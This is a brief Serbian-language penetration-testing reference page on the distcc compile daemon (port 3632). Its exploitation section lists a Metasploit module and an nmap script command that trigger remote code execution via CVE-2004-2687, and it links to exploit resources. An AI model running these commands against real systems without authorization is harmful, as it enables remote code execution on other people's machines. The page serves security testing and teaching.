{{#include ../banners/hacktricks-training.md}} # Osnovne informacije **Distcc** je alat koji poboljšava **proces kompajliranja** koristeći **neiskorišćenu procesorsku snagu** drugih računara u mreži. Kada je **distcc** postavljen na mašini, ova mašina može da distribuira svoje **zadace kompajliranja** drugom sistemu. Ovaj prijemni sistem mora da pokreće **distccd daemon** i mora imati instaliran **kompatibilan kompajler** da bi obradio poslati kod. **Podrazumevani port:** 3632 ``` PORT STATE SERVICE 3632/tcp open distccd ``` # Eksploatacija Proverite da li je ranjiv na **CVE-2004-2687** za izvršavanje proizvoljnog koda: ```bash msf5 > use exploit/unix/misc/distcc_exec nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` # Shodan _Ne mislim da shodan detektuje ovu uslugu._ # Resources - [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) - [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) Post created by **Álex B (@r1p)** {{#include ../banners/hacktricks-training.md}}